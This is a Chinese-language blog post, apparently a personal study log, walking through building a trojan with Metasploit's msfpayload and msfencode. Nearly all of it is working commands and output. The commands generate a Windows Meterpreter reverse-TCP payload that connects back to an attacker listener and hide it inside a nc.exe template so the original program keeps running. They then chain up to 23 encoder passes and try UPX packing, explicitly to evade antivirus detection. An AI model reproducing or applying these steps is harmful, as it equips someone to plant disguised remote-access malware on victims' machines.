使用msfpayload和msfencode进行木马的编写和编码处理


使用msfpayload和msfencode进行木马的编写和编码处理

# msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter    #先列出可用的msfpayload模块,然后借助grep工具进行过滤,找出自己需要的模块及其路径

windows/meterpreter/reverse_tcp    Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_dns   Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_rc4   Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_rc4_dns  Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/patchupmeterpreter/reverse_tcp  Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_dns  Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_rc4  Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_rc4_dns Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/x64/meterpreter/reverse_tcp    Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)

msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter #命令“msfpayload -l”用来列出攻击载荷,然后使用grep命令查询你所需要的攻击载荷模块,你要攻击的目标主机是Windows系统(grep windows),要有回连至监听主机的能力(grep reverse_tcp),并支持后渗透攻击功能(grep meterpreter)

# msfpayload windows/meterpreter/reverse_tcp O #最后一个是大写的o,而不是数字0,用于查看攻击载荷模块的配置参数

Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
Module: payload/windows/meterpreter/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 290
Rank: Normal

Provided by:
skape <>
sf <>
hdm <>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
Connect back to the attacker, Inject the meterpreter server DLL via
the Reflective Dll Injection payload (staged)

======
执行msfpayload和msfencode命令报错(后来发现问题在于nc.exe即使是在当前目录下也不能直接使用nc.exe,而要使用./nc.exe或是直接用绝对路径)

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x nc.exe -k -o nc_encode.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[-] x86/shikata_ga_nai failed: No such file or directory - /opt/metasploit/apps/pro/msf3/data/templates/nc.exe
[-] No encoders succeeded.

# find / -name “*shikata_ga_nai*”/usr/share/metasploit-framework/modules/encoders/x86/shikata_ga_nai.rb
————————————

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x nc.exe -k -o nc_encode.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[-] x86/shikata_ga_nai failed: No such file or directory - /opt/metasploit/apps/pro/msf3/data/templates/nc.exe
[-] No encoders succeeded.

 

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x /root/Desktop/temp/nc.exe -k -o nc_encode.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -x /root/Desktop/temp/nc.exe -k -o nc_encode_17.exe #为了进行免杀处理,这里我对攻击载荷一共执行了17次编码(5次shikata_ga_nai、2次alpha_upper、5次shikata_ga_nai、5次countdown)
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[*] x86/alpha_upper succeeded with size 919 (iteration=1)

[*] x86/alpha_upper succeeded with size 1907 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 1936 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 1965 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 1994 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 2023 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 2052 (iteration=5)

[*] x86/countdown succeeded with size 2070 (iteration=1)

[*] x86/countdown succeeded with size 2088 (iteration=2)

[*] x86/countdown succeeded with size 2106 (iteration=3)

[*] x86/countdown succeeded with size 2124 (iteration=4)

[*] x86/countdown succeeded with size 2142 (iteration=5)

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/call4_dword_xor -c 3 -t raw | msfencode -e x86/context_time -c 5 -t raw | msfencode -e x86/jmp_call_additive -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/temp/nc.exe -k -o nc_encode_23.exe #虽然这么复杂的编码了23次,但还是被检出来了,而且程序已经不可执行了

对生成的木马程序进行UPX编码,期望进一步的处理能够起到免杀的效果(不过不知道为什么总是出现”section size problem”的问题?):

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x /root/Desktop/temp/nc.exe -k -o nc_encode.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

# upx -6 -o nc_encode_upx6.exe nc_encode.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
--------------------   ------   -----------   ----------
upx: nc_encode.exe: CantPackException: section size problem

Packed 1 file: 0 ok, 1 error.

==============================================

# msfencode -h

    Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>

    OPTIONS:
-a <opt>  The architecture to encode as
-b <opt>  The list of characters to avoid: 'x00xff'
-c <opt>  The number of times to encode the data
-d <opt>  Specify the directory in which to look for EXE templates
-e <opt>  The encoder to use
-h        Help banner
-i <opt>  Encode the contents of the supplied file path
-k        Keep template working; run payload in new thread (use with -x)(需要和-x选项一同使用,在新线程中运行木马)
-l        List available encoders
-m <opt>  Specifies an additional module search path
-n        Dump encoder information
-o <opt>  The output file
-p <opt>  The platform to encode for
-s <opt>  The maximum size of the encoded data
-t <opt>  The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,psh,psh-net,vba,vba-exe,vbs,war
-v        Increase verbosity
-x <opt>  Specify an alternate executable template(指定一个可选的可执行程序作为模版)

算是之前的一个学习记录吧。。。

, ,

《“使用msfpayload和msfencode进行木马的编写和编码处理”》 有 5 条评论

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注